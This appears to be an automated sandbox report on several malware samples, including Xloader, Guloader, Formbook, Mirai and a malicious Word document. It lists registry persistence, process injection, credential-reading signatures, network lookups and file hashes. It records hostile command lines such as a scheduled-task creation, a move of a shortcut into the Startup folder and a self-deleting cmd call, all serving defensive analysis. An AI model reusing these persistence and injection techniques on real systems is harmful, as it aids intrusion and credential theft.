| Key opened | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\87597.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\hZpzJs = "C:\\Users\\Admin\\AppData\\Roaming\\hZpzJs\\hZpzJs.exe" | C:\Users\Admin\AppData\Local\Temp\87597.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1396 set thread context of 1200 | N/A | C:\Users\Admin\AppData\Local\Temp\87597.exe | C:\Users\Admin\AppData\Local\Temp\87597.exe |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\87597.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\87597.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\87597.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\87597.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\87597.exe | N/A |
Suspicious behavior: RenamesItself
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\87597.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\87597.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\87597.exe | N/A |
Suspicious use of WriteProcessMemory
outlook_office_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\87597.exe | N/A |
outlook_win_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\87597.exe | N/A |
Processes
| Process | Command Line |
| C:\Users\Admin\AppData\Local\Temp\87597.exe | "C:\Users\Admin\AppData\Local\Temp\87597.exe" |
| C:\Windows\SysWOW64\schtasks.exe | "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\emoGDf" /XML "C:\Users\Admin\AppData\Local\Temp\tmp5A50.tmp" |
| C:\Users\Admin\AppData\Local\Temp\87597.exe | "C:\Users\Admin\AppData\Local\Temp\87597.exe" |
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 72.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 212.20.149.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\tmp5A50.tmp
Analysis: behavioral10
Detonation Overview
| Field | Value |
| Submitted | 2024-11-21 20:43 |
| Reported | 2024-11-21 20:46 |
| Platform | win10v2004-20241007-en |
| Max time kernel | 93s |
| Max time network | 142s |
Command Line
Signatures
Xloader
Xloader family
Xloader payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 5080 set thread context of 2764 | N/A | C:\Users\Admin\AppData\Local\Temp\2cc3b4295747aeeb5a54b923fdbc9be766ee156c8914f5c07663f7cb1055068e.exe | C:\Users\Admin\AppData\Local\Temp\2cc3b4295747aeeb5a54b923fdbc9be766ee156c8914f5c07663f7cb1055068e.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\2cc3b4295747aeeb5a54b923fdbc9be766ee156c8914f5c07663f7cb1055068e.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2cc3b4295747aeeb5a54b923fdbc9be766ee156c8914f5c07663f7cb1055068e.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2cc3b4295747aeeb5a54b923fdbc9be766ee156c8914f5c07663f7cb1055068e.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
| Process | Command Line |
| C:\Users\Admin\AppData\Local\Temp\2cc3b4295747aeeb5a54b923fdbc9be766ee156c8914f5c07663f7cb1055068e.exe | "C:\Users\Admin\AppData\Local\Temp\2cc3b4295747aeeb5a54b923fdbc9be766ee156c8914f5c07663f7cb1055068e.exe" |
| C:\Users\Admin\AppData\Local\Temp\2cc3b4295747aeeb5a54b923fdbc9be766ee156c8914f5c07663f7cb1055068e.exe | "C:\Users\Admin\AppData\Local\Temp\2cc3b4295747aeeb5a54b923fdbc9be766ee156c8914f5c07663f7cb1055068e.exe" |
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 80.14.97.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 53.210.109.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.42.69.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.14.97.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
Files
Analysis: behavioral11
Detonation Overview
| Field | Value |
| Submitted | 2024-11-21 20:43 |
| Reported | 2024-11-21 20:46 |
| Platform | win7-20240903-en |
| Max time kernel | 119s |
| Max time network | 123s |
Command Line
Signatures
Guloader family
Guloader,Cloudeye
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\RICHIESTA DI OFFERTA.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RICHIESTA DI OFFERTA.exe | N/A |
Processes
| Process | Command Line |
| C:\Users\Admin\AppData\Local\Temp\RICHIESTA DI OFFERTA.exe | "C:\Users\Admin\AppData\Local\Temp\RICHIESTA DI OFFERTA.exe" |
Network
Files
Analysis: behavioral25
Detonation Overview
| Field | Value |
| Submitted | 2024-11-21 20:43 |
| Reported | 2024-11-21 20:46 |
| Platform | win10v2004-20241007-en |
| Max time kernel | 149s |
| Max time network | 148s |
Command Line
Signatures
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f50e04fd020ea3a6910a2d808002b30309d0000 | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = ffffffff | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 14002e80922b16d365937a46956b92703aca08af0000 | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Documents" | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\NodeSlot = "1" | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1 | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
Processes
| Process | Command Line |
| C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | "C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe" |
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 80.14.97.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 212.20.149.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 106.209.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
Files
Analysis: behavioral32
Detonation Overview
| Field | Value |
| Submitted | 2024-11-21 20:43 |
| Reported | 2024-11-21 20:43 |
| Platform | win7-20241023-en |
| Max time kernel | 0s |
Command Line
Signatures
Processes
Network
Files
Analysis: behavioral7
Detonation Overview
| Field | Value |
| Submitted | 2024-11-21 20:43 |
| Reported | 2024-11-21 20:46 |
| Platform | win7-20240903-en |
| Max time kernel | 122s |
| Max time network | 128s |
Command Line
Signatures
Credentials from Password Stores: Windows Credential Manager
Reads user/profile data of web browsers
Browser Information Discovery
Processes
| Process | Command Line |
| C:\Users\Admin\AppData\Local\Temp\29146c1ccdf280c8ac9d0c861f8bd222d2d93777c8a822da4d72c64fc3f78670.exe | "C:\Users\Admin\AppData\Local\Temp\29146c1ccdf280c8ac9d0c861f8bd222d2d93777c8a822da4d72c64fc3f78670.exe" |
Network
Files
Analysis: behavioral18
Detonation Overview
| Field | Value |
| Submitted | 2024-11-21 20:43 |
| Reported | 2024-11-21 20:46 |
| Platform | win7-20240903-en |
| Max time kernel | 118s |
| Max time network | 120s |
Command Line
Signatures
Process spawned unexpected child process
| Description | Indicator | Process | Target |
| Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process | N/A | C:\Windows\SysWOW64\mstsc.exe | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\mstsc.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| File created | C:\Windows\Tasks\openvpn-gui.job | C:\Windows\SysWOW64\mstsc.exe | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mstsc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
Office loads VBA resources, possible macro or embedded object present
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
Suspicious use of WriteProcessMemory
Processes
| Process | Command Line |
| C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\632cfc71bd4734fdd98e48166a52fbc4a48d43640f3375fd882dd374479bffb1.doc" |
| C:\Windows\splwow64.exe | C:\Windows\splwow64.exe 12288 |
| C:\Windows\SysWOW64\mstsc.exe | "C:\Windows\system32\mstsc.exe" |
| C:\Windows\SysWOW64\cmd.exe | cmd.exe /c "move /y "C:\Users\Admin\AppData\Local\Temp\openvpn-gui.lnk" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\openvpn-gui.lnk"" |
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | i.ibb.co | udp |
| FR | 162.19.58.157:443 | i.ibb.co | tcp |
| US | 8.8.8.8:53 | crl.microsoft.com | udp |
| GB | 2.19.117.18:80 | crl.microsoft.com | tcp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| IE | 2.19.61.135:80 | www.microsoft.com | tcp |
Files
\Users\Admin\AppData\Local\Temp\churner.dll
\Users\Admin\AppData\Local\Temp\churner.dll
| MD5 | 0546651845809bc22408fc50cb0d65d2 |
| SHA1 | 3d5ef77d628c56ecce8997f6ec0e8bb10c135d66 |
| SHA256 | 05d0eae0fe71eb89cbe6b752290004385d24511507dabd40e1e12fe2c271a06c |
| SHA512 | 86a63794dab6eacdb3b03569a9957c7ddd7c91269b7e75568857264a19c97617c33f09b2085e77308d3c4bfe1baa37f8793b0096a6ab5ba2442b51b00275bd6c |
C:\Users\Admin\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex
| MD5 | f3b25701fe362ec84616a93a45ce9998 |
| SHA1 | d62636d8caec13f04e28442a0a6fa1afeb024bbb |
| SHA256 | b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209 |
| SHA512 | 98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84 |
\Users\Admin\AppData\Local\openvpn-gui.exe
| MD5 | 87390e37e36622b054d4bdcbb7997b6c |
| SHA1 | 4d591f310318fd95a95109d7965a79729b65c69e |
| SHA256 | 5f067f86ad0f88a629263162810bf5052f5ebbd97d5d0de936311bb44c9f35e7 |
| SHA512 | 285abb19138a5dd109dfc0e76f4a4f96b3731a84ca9229e6ef9315513b052fd7ad7b2e0392ac9becbf4caf2c9bbdbd87f5b66486fb2ae1385c1fbe6e1ed643dd |
C:\Users\Admin\AppData\Local\Temp\openvpn-gui.lnk
| MD5 | a6716a28c760eafd1f2ba7279a351da6 |
| SHA1 | 317f388247ffced79d643e4f0d7ea90165b7ac1f |
| SHA256 | 09a5e5fa1c0d760dda86fadf0febfad69fc512b9f4b102c000f1470d9d98fece |
| SHA512 | a62a8bae1046a4e049cef426d98a24a395f571a837bc36022147e7f776ccefa3a7ff8bee2d49133abd0acfa1fa37436223763e1a0a1fba7bc97a47a3665891d4 |
Analysis: behavioral4
Detonation Overview
Submitted
2024-11-21 20:43
Reported
2024-11-21 20:45
Platform
win10v2004-20241007-en
Max time kernel
149s
Max time network
136s
Command Line
Signatures
Formbook
Formbook family
Formbook payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\төлем туралы есеп#454326_PDF.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2976 set thread context of 4544 | N/A | C:\Users\Admin\AppData\Local\Temp\төлем туралы есеп#454326_PDF.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
| PID 4544 set thread context of 3428 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | C:\Windows\Explorer.EXE |
| PID 2960 set thread context of 3428 | N/A | C:\Windows\SysWOW64\msdt.exe | C:\Windows\Explorer.EXE |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\төлем туралы есеп#454326_PDF.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msdt.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msdt.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msdt.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\төлем туралы есеп#454326_PDF.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\msdt.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Users\Admin\AppData\Local\Temp\төлем туралы есеп#454326_PDF.exe
"C:\Users\Admin\AppData\Local\Temp\төлем туралы есеп#454326_PDF.exe"
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tUlSEv" /XML "C:\Users\Admin\AppData\Local\Temp\tmp655C.tmp"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
C:\Windows\SysWOW64\msdt.exe
"C:\Windows\SysWOW64\msdt.exe"
C:\Windows\SysWOW64\cmd.exe
/c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Network
Files
C:\Users\Admin\AppData\Local\Temp\tmp655C.tmp
| MD5 | 4e4c0d7031c9eb71183bf297759d876f |
| SHA1 | aedcadef910ffefc69a8e6b1b74492027d4091c8 |
| SHA256 | 2b50a815e1d178ce84706d81fde6a9522b4bb355b823426e80fcd401211fcc6a |
| SHA512 | f8f82a49506880a59aa18dd3e47906e5bbbfb9c38a86f2310b63ab4d2c9bfc4305a4ced9bdfc2ad97635bf9c99e4c31ae6610e628fb49043c8f8b0b2f85261ad |
Analysis: behavioral13
Detonation Overview
Submitted
2024-11-21 20:43
Reported
2024-11-21 20:46
Platform
win7-20240903-en
Max time kernel
118s
Max time network
119s
Command Line
Signatures
Command and Scripting Interpreter: JavaScript
Processes
C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\39c1e12e0ada85fa835b623a4698345bf95372bea57a7d3a5070ea1d5d5d825c.js
Network
Files
Analysis: behavioral17
Detonation Overview
Submitted
2024-11-21 20:43
Reported
2024-11-21 20:46
Platform
debian9-mipsel-20240611-en
Max time kernel
0s
Command Line
Signatures
Mirai
Mirai family
Processes
/tmp/53074094addc55786936f3d67d7fe36554a7c4f4f96c06252ae768707295dbec
[/tmp/53074094addc55786936f3d67d7fe36554a7c4f4f96c06252ae768707295dbec]
Network
Files
memory/726-1-0x00400000-0x0045bf98-memory.dmp
Analysis: behavioral24
Detonation Overview
Submitted
2024-11-21 20:43
Reported
2024-11-21 20:46
Platform
win7-20240903-en
Max time kernel
118s
Max time network
127s
Command Line
Signatures
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\NodeSlot = "1" | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 9e0000001a00eebbfe23000010007db10d7bd29c934a973346cc89022e7c00002a0000000000efbe000000200000000000000000000000000000000000000000000000000100000020002a0000000000efbe7e47b3fbe4c93b4ba2bad3f5d3cd46f98207ba827a5b6945b5d7ec83085f08cc20002a0000000000efbe000000200000000000000000000000000000000000000000000000000100000020000000 | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
